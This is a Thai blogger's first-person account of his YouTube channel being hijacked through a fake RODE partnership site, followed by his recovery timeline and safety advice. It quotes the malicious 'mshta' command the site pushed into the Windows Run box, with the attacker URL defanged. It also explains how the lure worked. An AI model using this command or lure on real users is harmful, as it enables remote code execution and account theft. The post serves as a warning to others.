Creator
yokekungworld youtube channel removed ช่องปลิว

เล่าประสบการณ์ ช่อง YouTube YokekungWorld ปลิว จากการถูกหลอกให้ติดตั้งมัลแวร์ ผ่าน Win + R

yokekung September 29, 2025

ก่อนอื่นขอออกตัวก่อนเลยว่า เป็นความไม่ระมัดระวังของผมเอง และอยากจะบอกต่อเพื่อนๆ ให้ระมัดระวัง แม้จะไม่เปิดไฟล์แนบ แม้จะไม่ได้กดลิงค์ / คลิกลิงค์ ปลอม แต่สุดท้าย มันก็มาจากการคลิก Link จริงๆ นั่นแหล่ะครับ

โดยปกติแล้ว เราจะระมัดระวัง ในการก link ตรวจสอบ URL ตรวจสอบตัวสะกดของเว็บไซต์ และไม่เปิดไฟล์แนบจากคนที่ไม่รู้จัก ซึ่งผมทำ YouTube, Tiktok, Facebook, Blog, X มีการติดต่อกับแบรนด์ และอเจนซี่อยู่เป็นประจำ ทั้งไทยและต่างประเทศ ยิ่งต่างประเทศยิ่งต้องเช็คว่าเป็นอเจนซี่หรือแบรนด์จริงหรือเปล่า แต่บอกเลยว่า ยุคนี้ การทำเว็บ มันเนียนมากๆ ไม่ใช่เว็บปลอมที่ดูแล้วยังไงก็ปลอม

หลายคน ที่เป็นคนรีวิว น่าจะได้รับอีเมลจากต่างประเทศ มีทั้งจริงบ้าง ไม่จริงบ้าง นำเสนอ ทั้งเงิน ทั้งการ Barter สิ่งของ สินค้ารีวิว ซึ่งก่อนหน้านี้ มีติดต่อมาทาง LINE จากคนจีน ส่งเครื่องจริง รีวิวจริง อันนี้ไม่มีอะไร มีสัญญาเซ็นต์กันเรียบร้อย ไม่มีปัญหาอะไร และต่อมาก็มีไมค์ Boya Magic อันนี้ส่งไมค์มาใช้รีวิวและใช้งานตามปกติ ไม่ได้มีอะไรผิดแปลก แต่รอบนี้ เป็นไมค์ของ RODE ครับ ซึ่งมีอีเมลแนวๆ อเจนซี่ บอกว่าจาก RODE Team เราก็ไม่มั่นใจ แต่ก็ลองตอบกลับไปว่าส่งสินค้า Barter ได้นะ เรายินดี

rode gen 3 scam

แจ้งเพื่อทราบ ใน URL และ E-Mail ที่ผมเล่า จะใส่ xx ไว้เพื่อป้องกันการกด link ที่ผมเขียนอธิบายโดยไม่ได้ตั้งใจครับ แต่ของจริงจะไม่มี xx นะครับ

โดยเริ่มแรก เป็นการส่งเมล์มาดีลงานทั่วไป ด้วยอีเมล xxxxxxx@gazeta.pl อันนี้แหล่ะที่เราไม่ค่อยไตร่ตรอง แต่ก็ลองดู และต่อมา คุยไปคุยมา ส่งมาจาก contact@mediarode.com ติดต่อมาบอกว่ามาจาก RODE ให้เข้าไปกรอกข้อมูลที่เว็บ https://xxbrand.ly/xRodePartners (ผมใส่ x ไว้ ไม่ต้องกดนะครับ ใส่ไว้เพื่อไม่ให้เผลอกดหรือ copy ไปเปิด) ตรงนี้ ยอมรับว่า เราเองพลาดตรงนี้จริงๆ ไม่ได้เอะใจ Shorten Link นี้เลย มันคือ Shorten Link  rebrand.ly ครับ ไม่แน่ใจว่าเรา report rebrandly ให้ block link นี้ได้ไหม พอกด Link นี้ไปดูยังไม่มีอะไร มีหน้าให้กรอก URL YouTube เหมือนกับแพล็ตฟอร์ม Influencer ทั่วไป ที่เช็คยอดผู้ติดตาม Followers แล้วให้เลือกสินค้า เข้าใจได้ว่ามูลค่าสินค้าตามจำนวน Followers ซึ่งในขั้นตอนเลือกสินค้ายังไม่มีอะไร ทุกอย่างเหมือนกับเว็บไซต์ RODE จริงๆ ไม่มีฟอนต์ผิดเพี้ยน รูปสินค้า CI ต่างๆ เหมือนจริงทุกอย่าง แต่มาตกม้าตาย ตรงที่หน้าเว็บไซต์ ซึ่งทำเหมือนของ RODE ทุกอย่าง (ผมแจ้งตัวแทนจำหน่ายของ RODE ในไทยไปแล้วครับ) เลือกสินค้าเสร็จ หน้าจอให้ยืนยันตรวจสอบสเปคเครื่อง ว่า Compatible กับไมค์หรือเปล่า อันนี้แหล่ะครับที่เป็นตัวต้นเหตุ เราลองทดสอบสเปคเครื่องก็ไม่ผ่าน (Acer Swift 16 ซื้อปี 2024 สเปคจะไม่ผ่านได้ยังไง) หน้าจอบอกว่าให้กดตรวจสอบ แล้วกด Win + R ตรงนี้แหล่ะที่เราไม่ทันระวังครับ ซึ่งเรียกคำสั่ง Run ขึ้นมา จากนั้นเราก็ไม่ได้พิมพ์คำสั่งอะไรไปเลย ให้กด Check Compatibility แล้วมีระบุ Powered by RealTek ซึ่งคนเล่นคอมรู้จักกันอยู่แล้วในนาม PC Audio ครับ จากนั้นระบบก็แจ้งว่าไม่ผ่าน ให้กดดาวน์โหลด Microsoft Office 365 ซึ่งผมไม่ได้ใช้ ใช้ Office ที่ให้มากับโน๊ตบุ๊ค ก็เข้าไปเช็คดูตัวสะกด URL Microsoft ถูกต้องทุกอย่างเลยครับ ไม่ได้มีอะไรผิดปกติเลยครับ แล้วผมก็นอนช่วงตี 1 กว่า แต่ปล่อยคอมโหลด Office 365 ไปครับ ไม่ได้ปิดคอม จากนั้นพอตื่นขึ้นมา ก็เจอ Gmail / Google Account เด้งให้ใส่รหัสผ่าน ใส่หลายรอบก็ไม่ผ่าน ก็เลยจะ reset password ไม่ใช่เบอร์เรา จากนั้นก็เริ่มรู้ตัวว่าโดนแล้วครับ

rode scam

ตอนนั้นพอรู้ว่าโดน ยังคิดว่า เป็นที่ Microsoft 365 หรือเปล่า ไม่น่าใช่นะ URL ถูกต้อง แต่โปรแกรมก็เป็นปกติ ของแท้ แต่พอมาคุยกับน้องเมื่อวันศุกร์ (26 กันยายน) ขอบคุณน้องนิวด้วยครับ ก็เลยมาฉุกคิดว่า เอ๊ะ เหมือนหน้าจอให้กด Win + R น่าจะมาจากสาเหตุนี้แน่ๆ เลยครับ เพราะพอไปค้น อ้าว คำสั่งมันยังค้างอยู่เลยครับ แต่มันจะมองเป็นการเช็คสเปคระบบแหล่ะครับ เพราะเห็นแค่ URL นี้ จำได้ว่า เห็นแค่ตรง /check-drivers/ ครับ ก็คิดว่าคำสั่ง check drivers ทั่วไป โดยระบบแจ้งให้กด Windows + R แล้วมัน copy ยังไงไม่รู้ให้ใส่ mshta https://xxrodedriver.com/main/delivery/check-drivers/ กด enter คือในหน้าจอไม่ได้บอกเราเลยครับว่าให้พิมพ์คำสั่งอะไร มันเด้งมาเองเลย

rode scam

แต่พอผมลองบน Android ระบบไม่ยอมครับ แสดงว่า นางตั้งใจเล่นด้วย Windows เลย เพราะให้กด Win + R เรียกคำสั่งที่เราไม่คุ้นเคย โดยที่เราไม่ได้พิมพ์คำสั่งเลยครับ เพราะถ้าให้พิมพ์คำสั่งเองเราก็คงจะรู้สึกแปลกๆ อยู่ใช่ไหม แค่ให้กด Win + R แล้วก็ Enter เลยครับ คือเรียกนางเข้ามาแล้ว

ผมทำบน Google Chrome บน Windows ครับ ลองทำบน Google Chrome บน Android ไม่ยอมให้ทำต่อ ตอนนั้นก็ดันไม่เอะใจซะด้วย แต่ก็แคปจอไว้นะครับเลยมีภาพหน้าจออยู่

ผมลองค้นหาข้อมูล การใช้คำสั่ง “mshta” เพื่อ เรียกใช้ไฟล์ที่เป็นอันตรายซึ่งถูกโฮสต์อยู่บนเซิร์ฟเวอร์ภายนอก ผมคิดว่าน่าจะเกิดจากสาเหตุนี้ครับที่ทำให้มีการเข้าถึง มาเปลี่ยนรหัส ลบเบอร์โทร ลบ 2FA ลบ Passkey ผม แล้วก็น่าจะอัปวีดีโอจนทำให้ช่องถูกปิด ปลิวเลยครับ

ถ้าไล่เรียงลำดับเวลาก็ประมาณ 1.30 ครับ ผมจำได้ว่านอนตอนตี 1 นิดๆ แล้วหลับไปเลย (ภาพข้างล่างนี้อ่านจากล่างขึ้นบนนะครับ เป็น Log Google Chrome

log youtube

ดังนั้น ขอเตือนจากเหตุการณ์ของผมว่า นอกจาก จะไม่กด link ไม่กดเปิดไฟล์แนบแล้ว ถ้าไม่มั่นใจไม่ต้องคุยต่อเลย บางอเจนซี่ตอนนี้คุยใน LINE แล้วนะครับ แม้เราไม่ได้ชอบคุยใน LINE กันก็ตาม (เพราะข้อความหาย รูปหายได้) แต่การคุยผ่านอีเมล์ ที่เรามองว่าทางการและเป็นหลักฐานได้ (ใช่ครับ ผมมีหลักฐานหมดเลย) เพราะพอผมเมล์ตอบไป ก็ไม่มีคำตอบอะไรจากอีเมล์นั้นอีกเลย นั่นแหล่ะ แม่นแล้ว)

การแก้ไข

ผมเป็นสมาชิกของ MCN Online-Station มาเกือบครบปีครับ มีการหักเปอร์เซนต์รายได้ทุกเดือน ซึ่งช่วยเราได้ตอนเจอเหตุการณ์นี้ครับ ทาง Online-Station ประสานกับ Google, YouTube ให้ผมดีมากๆ ถ้านับวันคือ พบเหตุการณ์วันที่ 24 กันยายน ได้อีเมลคืนวันที่ 28 กันยายน ได้ช่องคืนวันที่ 29 กันยายน วันเสาร์อาทิตย์ก็ติดตามดีครับ ทาง Google, YouTube ก็ช่วยเหลือดีมากๆ เลยครับ และขอบคุณ YouTube Creator Community ด้วยครับ

Timline การแก้ไขช่อง YokekungWorld

  • 24 กันยายน 68 ตี 1.30 มีการบุกรุกเข้ามาในระบบ เป็น iPhone และเปลี่ยนไปใช้เบอร์ อเมริกา 2 เบอร์ เช้าวันแรกที่เจอเหตุการณ์ แจ้งทาง Online-Station ประสานงานกับ Google / YouTube ให้ ตอนนั้นเอา Gmail กลับมาได้แล้ว
  • 25 กันยายน 68 ช่วงเช้า ทาง Online-Station ประสานทาง YouTube ให้ติดต่อเรา กรอกแบบฟอร์มขอช่องคืน ดูแลดีมากครับ จากนั้นตอนเย็นของวันที่ 25/9 ทาง Google ได้ locked / blocked การเข้าถึง E-mail Gmail ของผม และบริการทุกบริการของ Google ของผมทั้งหมด โดยให้เหตุผลว่า ป้องกันการถูกแฮค ทำให้ผมแจ้ง PR / Agency ขอเปลี่ยนอีเมล์ส่งข่าว และหมายเชิญร่วมงานต่างๆ ทั้งหมด ระหว่างนั้นมีการพูดคุยกับ YouTube, Google ตลอดครับ
  • 27 กันยายน 68 มีอีเมล์ให้ recover reset password เรียบร้อย แต่ยังล็อคอินเข้าใช้งานไม่ได้ เพราะระบบยังล็อคว่าพฤติกรรมน่าสงสัย รอไปก่อน ช่วงนี้ Online-Station ก็ติดตามดีมากๆ ครับ
  • 28 กันยายน 68 เข้าใช้งาน Gmail ได้แล้วครับ แต่ก็คิดใหม่เลยว่า แยก Gmail ไว้ใช้เฉพาะ YouTube เลย คุยงาน แยกไปที่ yokekungworld@yahoo.com แทนไปเลยครับ หากเกิดอะไรขึ้นกับช่องจะไม่กระทบกับงานครับ
  • 29 กันยายน 68 เริ่มกู้คืนช่อง YouTube Yokekungworld มาได้แล้วครับ นี่คือครั้งแรกที่กลับมาเจอช่องตัวเองอีกครั้ง โดนเปลี่ยน Cover ทำ Playlist บน Home Tab และอัปคลิป 1 คลิป จนช่องปลิว

YouTube Spam Hijacked

ตอนนี้เคลียร์หมดแล้วครับ

สิ่งที่ควรทำต่อจากนี้ ก็คือการระมัดระวังมากขึ้น ก่อนหน้านี้ผมอยู่กับ MCN เจ้าหนึ่ง แต่แทบไม่ได้คุยกันเลยครับ แต่พอมาอยู่กับ MCN Online-Station นี่ประสานกับ YouTube, Google ไวมาก ก่อนหน้านี้เคยคุยกับเพื่อนๆ ครับว่าทำไมถึงต้องอยู่กับ MCN หนึ่งในเหตุผลก็คือ ช่วยดันช่องเรา และดูแลเราตอนช่องโดนปิดครับ แต่ไม่คิดว่าจะได้เจอเหตุการณ์นี้จากความไม่ระวังของเราเอง ก็เลยเอามาบอกเล่ากันครับ ทั้งนี้บทความนี้ได้ปรึกษากับทาง Online-Station และส่งบทความนี้ให้อ่านแล้วครับ

ขอบคุณ พี่ๆ เพื่อนๆ น้องๆ ทุกคนที่สอบถามทั้งออนไลน์และเจอหน้ากันในงาน Xiaomi นะครับ ด้วยระยะเวลา หลายๆ คนบอกว่า ใช้เวลาหลายสัปดาห์และเป็นเดือน ยาวนาน ซึ่งผมก็เปิดช่องใหม่เพิ่มแล้วตั้งแต่วันแรกที่เจอเหตุการณ์ครับ

ออกตัวปิดท้าย ในบทความมีการพูดถึง Online-Station ไม่ได้มีใครชวนเราเข้าสังกัด แค่เรารู้สึกว่า อยู่กับ MCN เดิมมาหลายปีมากๆ ก็เลยลองดู อยากให้ช่วยดูแลเรา แบ่งรายได้ เราโอเค แต่ขอให้ช่วยเรา ประสานงานให้เรา ทำดีก็ชมครับ แล้วเราก็อยู่ต่อกับ MCN นี้

แนะนำเพิ่มเติม ทุกคนควรมีเบอร์สำรอง และมีอีเมล์สำรองนะครับ อาจจะไม่ใช่อีเมล์ตัวเองก็ได้ ของแฟน ของพ่อแม่ ก็ได้ที่เราไว้ใจ เพื่อติดต่อในช่วงที่ช่องโดนปิดครับ

/ / / / / / / / / /

Nunchavit Chaiyapaksopon

สนใจงานเขียน มาตั้งแต่ อ่านนิตยสาร จนได้เขียนในนิตยสารคอมพิวเตอร์ มือถือ จนมาเป็น Blogger เขียนบนออนไลน์ สนใจมือถือ สมาร์ทโฟน การตลาดออนไลน์ ชอบ Social Media อยู่กับโลกสังคมออนไลน์ 20 ชั่วโมงต่อวัน ปัจจุบัน เป็น Content Editor เว็บไซต์ ADSLThailand.com, ทำวีดีโอบน YouTube YokekungWorld ติดตามได้ที่ Twitter Facebook Instagram ทุกบริการใช้ชื่อ yokekung

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.